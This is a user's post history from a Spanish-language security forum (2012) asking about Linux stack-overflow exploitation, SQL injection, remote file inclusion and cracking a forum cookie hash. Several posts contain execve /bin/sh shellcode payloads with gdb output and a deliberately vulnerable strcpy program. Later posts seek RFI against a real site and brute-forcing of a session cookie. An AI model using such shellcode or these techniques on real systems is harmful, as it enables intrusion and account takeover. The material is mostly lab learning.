|
71
|
Seguridad Informática / Bugs y Exploits / solo me falta saber porque no puedo saltar a la shell, que podria hago mal?
|
en: 17 Mayo 2012, 04:16 am
|
bueno ya creo logre avanzar pero ahora tengo el problema que no logre hacer funcionar el exploit les dire los pasos que hago para ver si me pueden ayudar mas facilmente primero desactivo cat /proc/sys/kernel/randomize_va_space 0 compilo el archivo vulnerable de esta manera gcc -ggdb --no-stack-protector vuln.c -o vuln ejecuto gdb y meto la cantidad de "A" que son necesarios $(perl -e 'print "A" x 44 . "B" x 4')
(gdb) i r eip ebp eip 0x42424242 0x42424242 ebp 0x41414141 0x41414141 (gdb) lo que quiere decir que si pongo una shell tendria que quedar... "A" = 44 - 25 = 19 $(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4') Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) i r eip ebp eip 0x42424242 0x42424242 ebp 0x80cd0bb0 0x80cd0bb0
Aqui es donde tengo que buscar donde esta RET, lo hago de esta manera $(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')
Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) br overflow Breakpoint 1 at 0x80483ea: file vuln.c, line 6. (gdb) r AAA The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, overflow (badbeef=0xbffff602 "AAA") at vuln.c:6 6 strcpy(buffer, badbeef); (gdb) x/x buffer 0xbffff380: 0x00000000 (gdb) al parecer es pero aqui viene el problema si pongo eso no me aparce ninguna shell, que podria estar mal? $(perl -e 'print "\x90" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x80\xf3\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault. 0xbffff380 in ?? () (gdb) c Continuing.
Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb)
espero me puedan ayudar, abajo les dejo el codigo del archivo vulnerable salu2 #include <stdio.h> #include <string.h> void overflow(char *badbeef){ char buffer[32]; } int main(int argc, char *argv[]){ overflow(argv[1]); return 0; }
|
|
|
72
|
Seguridad Informática / Bugs y Exploits / no puedo conseguir RET en un exploit de linux [RESUELTO]
|
en: 14 Mayo 2012, 21:05 pm
|
hola una duda... en un tuto de Garfield07, al usar gdb y poner un break en una funcion al usar este comando le aparece el RET Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8 8 strcpy (buffer, buff); (gdb) x/x buffer 0xbffff904: 0x00000000 pero yo al hacerlo me aparece diferente (gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) br vuln Breakpoint 1 at 0x804845a: file vuln.c, line 8. (gdb) r AAA The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, vuln (buff=0xbffff604 "AAA") at vuln.c:8 8 strcpy (buffer, buff); (gdb) x/x buffer 0xbffff37c: 0xb7fbfff4 y al continuar con la execucion para visualizar la shell me aparece esto (gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"') Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')
Breakpoint 1, vuln ( buff=0xbffff5d3 "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀|\363\377\277") at vuln.c:8 8 strcpy (buffer, buff); (gdb) c Continuing.
Program received signal SIGILL, Illegal instruction. 0xbffff37e in ?? () al principio me llamo la atencion "Illegal instruccion" asi que use x/x buff y me salio asi que a los NOP le aumente a "r AAAA" y me aparce no se si eso tenga algo que ver, igual el ret me aparece igual alguien sabe que podria salir mal o que otra manera podria encontrar RET? como informacion adicional uso debian con gcc-4.6
|
|
|
73
|
Seguridad Informática / Bugs y Exploits / porque al usar breakpoint con GDB no me aparece nada?[RESUELTO]
|
en: 13 Mayo 2012, 01:34 am
|
hola estaba practicando sobre exploits en linux ya entendi como hacer una shell con asm y obtener los opcodes, para hacer la shellcode usando nasm y hexadump, estuve leyendo el tuto de Smashing The Stack For Fun And Profit tambien ahorita estaba recordando unos post sobre eso y quise volver a intentarlo antes no me salia ciertas cosas que ya comprendi... ahora tengo un problema con GDB, cuando uso este codigo #include <stdio.h> #include <string.h> int vuln (char *buff) { char buffer [36]; strcpy (buffer, buff); } int main (int argc, char *argv []) { vuln (argv [1]); } int feo () { printf ("Eres feo!!!"); exit (0); } lo executo con gdb y coloco esto, en mi version debian le tuve que cambiar los nop's porque se necesitó mas r $(perl -e 'print "\x90" x 23 . "B" x 25 . "XXXX"') ahora me aparece esto correctamente /vuln $(perl -e 'print "\x90" x 23 . "B" x 25 . "XXXX"')
Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? ()
aqui supuestamente me deberia de aparecer algo asi usando un break en la funcion vuln (gdb) br vuln Breakpoint 1 at 0x804842a: file vuln.c, line 8. (gdb) r AAA The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/juanra/Escritorio/Shell/vuln AAA
Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8 8 strcpy (buffer, buff); pero a mi no me sale eso, de hecho no sale nada (gdb) br vuln Breakpoint 1 at 0x804845a (gdb) r AAA The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, 0x0804845a in vuln ()
que podria estar saliendo mal, ya intente incluso usar el break con buff y buffer y tampoco espero me puedan ayudar, porque apenas estoy tratando de entender como encontrar el RET para el exploit salu2
|
|
|
74
|
Programación / Programación C/C++ / porque no puedo realizar este ejercicio?, es por el compilador?
|
en: 11 Mayo 2012, 04:26 am
|
hola tengo un codigo de un tutorial sobre exploits, pero no logro saber porque no me funciona #include <stdio.h> #include <string.h> int main(){ int array[5]; int i; for (i = 0; i <= 255; i++){ array[i] = 10; } }
el codigo en si, funciona bien, pero supuestamente al compilarlo tendria que salir de esta forma shellcoders@debian:~/chapter_2$ cc buffer2.c shellcoders@debian:~/chapter_2$ ./a.out Segmentation fault (core dumped)
sin embargo, cuando lo hago no me aparece gazette@gazetto:~/ejercicios$ ./a.out gazette@gazetto:~/ejercicios$ creen que podria ser por el compilador, utilizo gcc-4.6 y este tutorial es del 2007 creo todavia se usaba gcc-3.xx, pero no tengo idea si es por el compilador que tengo un resultado diferente o porque mas podria ser? en la pagina de gnu solo esta la version gcc-3.2 pero no se si intentar instalarlo o si eso no tiene nada que ver lo supuse porque AlbertoBSD en un tutorial explica las diferencias entre gcc-4 y gcc-3 al crear un exploit espero me puedan ayudar, salu2
|
|
|
75
|
Seguridad Informática / Bugs y Exploits / sera que no puedo executar exploits en linux por la version gcc?
|
en: 10 Mayo 2012, 20:31 pm
|
hola estaba siguiendo un sencillo ejemplo de exploit sobre linux y en el inicio muestra esto #include <stdio.h> #include <string.h>
int main(){
int array[5]; int i;
for (i = 0; i <= 255; i++){
array[i] = 10; }
} y me dice que al executarlo me tendria que aparecer esto shellcoders@debian:~/chapter_2$ cc buffer2.c shellcoders@debian:~/chapter_2$ ./a.out Segmentation fault (core dumped)
pero cuando yo lo hago no me aparece nada gazette@gazetto:~/ejercicios$ ./a.out gazette@gazetto:~/ejercicios$
sera acaso que uso gcc-4.6?, talvez aqui usaron otra version pero no especifican... alguien podria decirme porque no podria funcionar esto ya que siempre tengo el problema de que quiero leer algun tuto sobre exploit en linux y nunca puedo porque algo sale diferente, y ahorita se me ocurrio que prodria ser por el compilador espero me puedan ayudar....salu2
|
|
|
76
|
Seguridad Informática / Nivel Web / porque no puedo ver los mensajes de error de mysql como " SQL syntax near"?
|
en: 10 Mayo 2012, 19:02 pm
|
hola estoy siguendo este tutorial +--------------------------------------------------------+ | | | SQL injection && Blind Sql Injection | | | | Escrito por l0ve | | | +--------------------------------------------------------+ en el menciona bugs como por ejemplo http://localhost/print.php?id=1' donde me tendria que aparecer You have an error in your SQL syntax near ''.................. pero por mas cosas que le pongo como me menciona el tuto no me aparece ese error, incluso con cosas como http://localhost/print.php?id=1 and 1=1 nisiquiera con eso me aparece algo, unicamente si lo dejo normal me aparece bien la pagina http://localhost/print.php?id=1 sera acaso que mysql ya viene corregido eso?, o cual podria ser la causa de que no me aparezcan esos errores? salu2
|
|
|
77
|
Seguridad Informática / Nivel Web / no entiendo bien sobre que es un token, un referer y secs
|
en: 2 Mayo 2012, 06:40 am
|
hola
perdon la ignorancia, pero me podrian explicar que son los token y los referer? y para que sirven
estuve viendo el post donde gano yoya, y el documento de universal hacking y creo entender que los token son los usuarios, pero que son esos numeros?, es el usuario cifrado?, pero en el documento no aparecen numeros sino el usuario completo
y el referer por lo que lei del post de yoya es la ultima direccion visitada, pero que relacion tiene con secs?
y que son los secs?, peron por tanta pregunta perocreo comprender el metodo de yoya pero no entiendo sobre que es token, referer y secs
espero me puedan ayuda
salu2
|
|
|
78
|
Seguridad Informática / Nivel Web / como podria hacer un RFI con esto?
|
en: 20 Febrero 2012, 03:12 am
|
hola
una pregunta, quise probar como hacer un RFI pero segui un manual donde decia que a veces hay codigo en el que se usa include() para redireccionar un archivo php, algo asi me aparecio despuede buscar en una pagina
pero cuando hago el intento segun en el ejemplo al poner un link con el php, la pagina lo pone en include redireccionando, lo intente pero me quedo asi
include(Content/content_index.php.php)
con lo que me di cuenta que antes de ponerlo, le incluye "content_" y ".php", y mi pregunta es
como puedo hacer RFI si a lo que le ponga me pondra asi "content_www.paginaweb.com/index.php.php"?
hay forma de lograrlo?, espero me puedan orientar
salu2
|
|
|
79
|
Seguridad Informática / Hacking / ayuda, aprendiendo a descifrar cookies
|
en: 19 Febrero 2012, 22:59 pm
|
hola
tengo ganas de aprender sobre hacking nivel web, ya e estado leyendo varios tuto e incluso me meti a wazone a hacer las pruebas, me gusto la prueba cocinar, cuando logre pasarla descubri algo que no sabia, no dire mas para no arruinar la prueba
ahora quisiera hacer una prueba con una cuenta mia, me logue en mi cuenta de otro foro y tome mi cookie, siempre escuche que al robar una cookie tendrias acceso a varios lugares, mi pregunta es
como descifro, segun entendi sobre varios manuales, hay varias formas, ya vi una, pero vbulletin creo las cifra en md5 con salt
ahora estoy usando un prograa llamado pasword pro y utilizo la funcion md5($pass,$salt)
no se si este bien usar esa... y lo hago en fuerza bruta, el codigo de la cokkie que se hizo aleatoriamente es esta
27785fe9c5bb9af9fb95a5c14d2118c7
quisiera saber si estare en lo correcto al hacer eso o habra otra forma?
una vez vi un video de defcom, mostrando algo de eso, y reducia el tiempo de busqueda con fechas y no se que mas, alguien sabe algo de esto?
|
|
|
80
|
Seguridad Informática / Nivel Web / me podrian decir donde hay mas scripts para aprender sobre auditoria web?
|
en: 17 Febrero 2012, 21:26 pm
|
hola
pues tengo ganas de aprender sobre auditoria sobre web, la mayor parte del tiempo me dedique a programar por ejemplo exploits, troyanos, y programas para probar la seguridad de los antivirus etc, jeje, casi nunca pude lograr hacerlo con otras computadoras porque siempre me gusto programar mis propias herramientas y cuando las terminaba, aparecia el anuncio de que tal metodo ya no funcionaria, los malditos routers, DEP, ASLR, heuristica, etc... pero bueno, lo poco que si logre hacer funcionar me gusto
pero ahora me gustaria saber mas sobre auditorias para mysql, php, html, etc... ya tenia ganas de hace tiempo y comenzaba a investigar pero como todo buen foro siempre llega nueva informacion y queria intentarlo y dejaba de lado la web
ahora quiero retomarlo bien, he estado leyendo el post de temas destacados y veo bastante informacion, pero conocen algunos scripts o algunos link done haya ejemplos?
porque hay mucha teoria que se que debo de leer, pero soy de los que entienden mas practicando, porque suelo cambiar cosas para ir poniendo las cosas mas dificiles e ir mejorando en lo que aprendo
alguien me podria compartir algunos ejemplos que pueda poner en mi servidor de apache para practicar, ahorita solo encontre un post hecho por zhynar_X, seguire su tutorial pero me gustaria saber si hay mas tutoriales de esa forma
gracias, salu2
|
|
|
|
|
|
|